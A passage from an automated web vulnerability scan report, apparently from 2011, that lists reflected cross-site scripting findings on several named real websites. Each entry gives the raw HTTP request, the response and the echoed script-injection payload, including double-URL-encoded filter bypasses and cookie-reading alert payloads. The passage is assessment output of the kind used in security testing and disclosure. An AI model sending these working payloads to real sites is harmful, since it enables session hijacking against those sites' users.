Host:   http://www.embarkons.com
Path:   /sharer.php/images/postit-bulb.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6be61<img%20src%3da%20onerror%3dalert(1)>314a004caad was submitted in the REST URL parameter 3. This input was echoed as 6be61<img src=a onerror=alert(1)>314a004caad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sharer.php/images/postit-bulb.gif6be61<img%20src%3da%20onerror%3dalert(1)>314a004caad HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:52 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:53 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="pagename" style="display:none;">postit-bulb.gif6be61<img src=a onerror=alert(1)>314a004caad</div>
...[SNIP]...

4.101. http://www.embarkons.com/sharer.php/images/postitsubmitbtn.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/images/postitsubmitbtn.png

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4ef80<img%20src%3da%20onerror%3dalert(1)>f6413b1c94b was submitted in the REST URL parameter 3. This input was echoed as 4ef80<img src=a onerror=alert(1)>f6413b1c94b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sharer.php/images/postitsubmitbtn.png4ef80<img%20src%3da%20onerror%3dalert(1)>f6413b1c94b HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:53 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:54 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22683

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="pagename" style="display:none;">postitsubmitbtn.png4ef80<img src=a onerror=alert(1)>f6413b1c94b</div>
...[SNIP]...

4.102. http://www.embarkons.com/sharer.php/images/search-con.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/images/search-con.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e1832<img%20src%3da%20onerror%3dalert(1)>f94e94396e was submitted in the REST URL parameter 3. This input was echoed as e1832<img src=a onerror=alert(1)>f94e94396e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sharer.php/images/search-con.gife1832<img%20src%3da%20onerror%3dalert(1)>f94e94396e HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:54 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:54 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22677

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="pagename" style="display:none;">search-con.gife1832<img src=a onerror=alert(1)>f94e94396e</div>
...[SNIP]...

4.103. http://www.embarkons.com/sharer.php/src/captcha.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/src/captcha.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 57a50<img%20src%3da%20onerror%3dalert(1)>9823491c1f8 was submitted in the REST URL parameter 3. This input was echoed as 57a50<img src=a onerror=alert(1)>9823491c1f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sharer.php/src/captcha.php57a50<img%20src%3da%20onerror%3dalert(1)>9823491c1f8 HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:58 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:58 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22675

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="pagename" style="display:none;">captcha.php57a50<img src=a onerror=alert(1)>9823491c1f8</div>
...[SNIP]...

4.104. http://www.embarkons.com/sharer.php/src/captcha.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.embarkons.com
Path:   /sharer.php/src/captcha.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4c1f1<img%20src%3da%20onerror%3dalert(1)>7a467385bc8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4c1f1<img src=a onerror=alert(1)>7a467385bc8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sharer.php/src/captcha.php/4c1f1<img%20src%3da%20onerror%3dalert(1)>7a467385bc8 HTTP/1.1
Host: www.embarkons.com
Proxy-Connection: keep-alive
Referer: http://www.embarkons.com/sharer.php/12956%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9574d4dbe79
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; projectlist=momentum

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:48:55 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Set-Cookie: PHPSESSID=509jmnjagef2bl6d129sbvo1n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: projectlist=momentum; expires=Sun, 01 May 2011 14:48:55 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="pagename" style="display:none;">4c1f1<img src=a onerror=alert(1)>7a467385bc8</div>
...[SNIP]...

4.105. http://www.favlog.de/submit.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.favlog.de
Path:   /submit.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b394"%20style%3dx%3aexpression(alert(1))%203927ed65879 was submitted in the REST URL parameter 1. This input was echoed as 4b394\" style=x:expression(alert(1)) 3927ed65879 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /submit.php4b394"%20style%3dx%3aexpression(alert(1))%203927ed65879 HTTP/1.1
Host: www.favlog.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:15:17 GMT
Server: Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k mod_jk/1.2.26 PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=9ccdeh3nqm7lod25rvsqul5or5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18450


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
<a href="/upcoming/submit.php4b394\" style=x:expression(alert(1)) 3927ed65879">
...[SNIP]...

4.106. http://www.gabbr.com/submit/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gabbr.com
Path:   /submit/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 48e8d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec3a4c354593 was submitted in the REST URL parameter 1. This input was echoed as 48e8d</title><script>alert(1)</script>c3a4c354593 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /submit48e8d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec3a4c354593/ HTTP/1.1
Host: www.gabbr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:14:58 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=2a3c686927d5809dba33b96974e73b08; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 35636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<title>Gabbr.com: Submit48e8d</title><script>alert(1)</script>c3a4c354593</title>
...[SNIP]...

4.107. http://www.gametrailers.com/remote_wrap.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gametrailers.com
Path:   /remote_wrap.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 217ce%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e9c0af3ddee0 was submitted in the REST URL parameter 1. This input was echoed as 217ce"><img src=a onerror=alert(1)>9c0af3ddee0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /remote_wrap.php217ce%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e9c0af3ddee0 HTTP/1.1
Host: www.gametrailers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.63 (Unix) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Pragma: akamai-x-cache-on
Accept-ESI: 1.0
X-GT-Cache-Key: s=_404_php,r=_remote_wrap_php217ce_22_3e_3cimg_20src_3da_20onerror_3dalert_281_29_3e9c0af3ddee0,key=remote_wrap.php217ce%22%3e%3cimg%20src%3da%20onerror%3dalert%281%29%3e9c0af3ddee0
Content-Type: text/html
Cache-Control: max-age=1200
Date: Sun, 17 Apr 2011 14:15:10 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak-mobile-detected=no; expires=Sun, 17-Apr-2011 20:15:10 GMT; path=/
Vary: User-Agent
Content-Length: 34633

<!DOCTYPE html public "-//w3c//dtd html 4.01 transitional//en"
"http://www.w3.org/tr/html4/loose.dtd">
   <html>

<head>
   <title>404 - Video Game Trailers for Wii, PSP, Xbox, PS3 & More | Upcoming
...[SNIP]...
<script type="text/javascript" src="/ui/php/inc.php?uri=/remote_wrap.php217ce"><img src=a onerror=alert(1)>9c0af3ddee0">
...[SNIP]...

4.108. http://www.gillmanauto.com/smartbrowse/ajax/used.htm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gillmanauto.com
Path:   /smartbrowse/ajax/used.htm

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as text between NOSCRIPT tags. The payload 3025a</noscript><script>alert(1)</script>81d6fe8ab38 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartbrowse3025a</noscript><script>alert(1)</script>81d6fe8ab38/ajax/used.htm?detect=false&reset=InventoryListing&showYear=true&showMake=true&showModel=true&showAllModels=false&showTrim=true&showBodyStyle=true&showMileage=false&showPrice=true&showLocation=false&showHighywayMpgs=false HTTP/1.1
Host: www.gillmanauto.com
Proxy-Connection: keep-alive
Referer: http://www.gillmanauto.com/index.htm
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=63e942630a0a0043011b315cea80c7c3; JSESSIONID=h1refb1rpn7nt; lbpoolmember=1728122378.40475.0000; ddcpoolid=CmsPoolA; __utmz=1.1303051319.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/41; __utma=1.1275321047.1303051319.1303051319.1303051319.1; __utmc=1; __utmb=1.2.10.1303051319

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:42:43 GMT
Server: Jetty/5.1.1 (Linux/2.6.18-128.7.1.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 13660

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms26.dealer.ddc p7070 -->

   <title>Gillman Acura, Honda, Nissan, Mitsubishi, Chevrolet, Subaru, Chrysler, Jeep, Dodge, GMC,
...[SNIP]...
</script>1fec5e9f872&amp;20=www.gillmanauto.com&amp;21=/smartbrowse3025a</noscript><script>alert(1)</script>81d6fe8ab38/ajax/used.htm&amp;50=63e942630a0a0043011b315cea80c7c3&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62
...[SNIP]...

4.109. http://www.gillmanauto.com/smartbrowse/ajax/used.htm [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gillmanauto.com
Path:   /smartbrowse/ajax/used.htm

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between NOSCRIPT tags. The payload aaedb</noscript><script>alert(1)</script>2cfa6db0fd6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smartbrowse/ajaxaaedb</noscript><script>alert(1)</script>2cfa6db0fd6/used.htm?detect=false&reset=InventoryListing&showYear=true&showMake=true&showModel=true&showAllModels=false&showTrim=true&showBodyStyle=true&showMileage=false&showPrice=true&showLocation=false&showHighywayMpgs=false HTTP/1.1
Host: www.gillmanauto.com
Proxy-Connection: keep-alive
Referer: http://www.gillmanauto.com/index.htm
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=63e942630a0a0043011b315cea80c7c3; JSESSIONID=h1refb1rpn7nt; lbpoolmember=1728122378.40475.0000; ddcpoolid=CmsPoolA; __utmz=1.1303051319.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/41; __utma=1.1275321047.1303051319.1303051319.1303051319.1; __utmc=1; __utmb=1.2.10.1303051319

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:42:44 GMT
Server: Jetty/5.1.1 (Linux/2.6.18-128.7.1.el5 i386 java/1.5.0_16
P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html;charset=iso-8859-1
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 13660

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- wccms26.dealer.ddc p7070 -->

   <title>Gillman Acura, Honda, Nissan, Mitsubishi, Chevrolet, Subaru, Chrysler, Jeep, Dodge, GMC,
...[SNIP]...
</script>1fec5e9f872&amp;20=www.gillmanauto.com&amp;21=/smartbrowse/ajaxaaedb</noscript><script>alert(1)</script>2cfa6db0fd6/used.htm&amp;50=63e942630a0a0043011b315cea80c7c3&amp;51=&amp;52=&amp;53=&amp;54=en_US&amp;55=173.193.214.243&amp;56=&amp;60=&amp;61=&amp;64=&amp;58=&amp;59=&amp;80=&amp;81=&amp;82=&amp;83=&amp;62-0=10
...[SNIP]...

4.110. http://www.haber.gen.tr/edit [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /edit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac7fd"><script>alert(1)</script>0550415377b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /editac7fd"><script>alert(1)</script>0550415377b HTTP/1.1
Host: www.haber.gen.tr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 13:52:27 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=f13320fbf75a3c23016d2ee5bddaf39d; path=/; domain=.haber.gen.tr
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 63739


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/editac7fd"><script>alert(1)</script>0550415377b" type="hidden" />
...[SNIP]...

4.111. http://www.haber.gen.tr/images/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /images/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 255cd"><script>alert(1)</script>7d1b8b1193c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images255cd"><script>alert(1)</script>7d1b8b1193c/favicon.ico HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf; __utmb=54855858; __utmc=54855858; __utma=54855858.1891209206.1303050928.1303050928.1303050928.1; __utmz=54855858.1303050964.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/40|utmcmd=referral; OAID=15e51418fc85ab980a8e7cfcb9a92c51

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:13:58 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63767


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/images255cd"><script>alert(1)</script>7d1b8b1193c/favicon.ico" type="hidden" />
...[SNIP]...

4.112. http://www.haber.gen.tr/images/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /images/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8f07"><script>alert(1)</script>a5748c90cb8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/favicon.icoa8f07"><script>alert(1)</script>a5748c90cb8 HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf; __utmb=54855858; __utmc=54855858; __utma=54855858.1891209206.1303050928.1303050928.1303050928.1; __utmz=54855858.1303050964.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/40|utmcmd=referral; OAID=15e51418fc85ab980a8e7cfcb9a92c51

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:14:07 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63767


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/images/favicon.icoa8f07"><script>alert(1)</script>a5748c90cb8" type="hidden" />
...[SNIP]...

4.113. http://www.haber.gen.tr/openx/www/delivery/ajs.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /openx/www/delivery/ajs.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7ab3"><script>alert(1)</script>471d70f85ea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /openxb7ab3"><script>alert(1)</script>471d70f85ea/www/delivery/ajs.php?zoneid=3&cb=68239046679&loc=http%3A//www.haber.gen.tr/editac7fd%2522%253E%253Cscript%253Ealert%28%2522IDIOT%2522%29%253C/script%253E0550415377b&referer=http%3A//burp/show/40 HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
